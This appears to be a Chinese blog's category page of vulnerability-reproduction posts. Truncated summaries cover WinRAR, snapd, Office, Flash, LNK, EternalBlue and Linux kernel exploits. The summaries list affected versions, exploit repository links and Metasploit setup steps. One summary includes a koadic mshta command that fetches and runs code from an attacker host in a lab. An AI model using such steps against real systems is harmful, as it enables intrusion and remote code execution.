随笔分类 -  漏洞复现

摘要:影响版本: WinRAR < 5.70 Beta 1 Bandizip < = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 360压缩 < = 4.0.0.1170 测试版本:WinRAR 5.61 工具地址:https://github.com/droe/acefile 阅读全文
posted @ 2019-03-01 23:16 Sch01aR# 编辑
摘要:漏洞描述: Ubuntu 版本: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS 2.28 < snapd < 2.37 会存在该漏洞 Poc Github:https://github.com/initstring/d 阅读全文
posted @ 2019-02-28 21:42 Sch01aR# 编辑
摘要:影响的 Windows 版本: Microsoft Windows 10 Version 1607 for 32-bit SystemsMicrosoft Windows 10 Version 1607 for x64-based SystemsMicrosoft Windows 10 Versio 阅读全文
posted @ 2018-12-21 22:42 Sch01aR# 编辑
摘要:项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer 阅读全文
posted @ 2018-09-01 15:09 Sch01aR# 编辑
摘要:漏洞描述: CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。 微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174 由于 VBScript 脚本执行引擎(vbscript. 阅读全文
posted @ 2018-06-12 23:19 Sch01aR# 编辑
摘要:该漏洞在老版本中被修复了,但新的版本还存在漏洞 影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本 Exp下载地址:http://cyseclabs.com/exploits/upstream44.c 测试环境 sch01ar@ubuntu:~$ 阅读全文
posted @ 2018-03-17 16:26 Sch01aR# 编辑
摘要:项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137 攻击机器IP:192.168.220.152 目标靶机:192.168.220.151,浏览器为360浏览器 用msfve 阅读全文
posted @ 2018-03-15 18:40 Sch01aR# 编辑
摘要:项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[root@sch01ar]─[/sch01ar/ 阅读全文
posted @ 2017-11-21 22:34 Sch01aR# 编辑
摘要:开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set pa 阅读全文
posted @ 2017-11-05 16:09 Sch01aR# 编辑
摘要:目标主机:192.168.220.148,系统为Microsoft Windows Server 2008 R2 Datacenter,开启了445端口 开启msf root@sch01ar:~# msfconsole 搜索一下模块 msf > search Eternalblue 选择第二个 ms 阅读全文
posted @ 2017-10-15 15:55 Sch01aR# 编辑

点击右上角即可分享
微信分享提示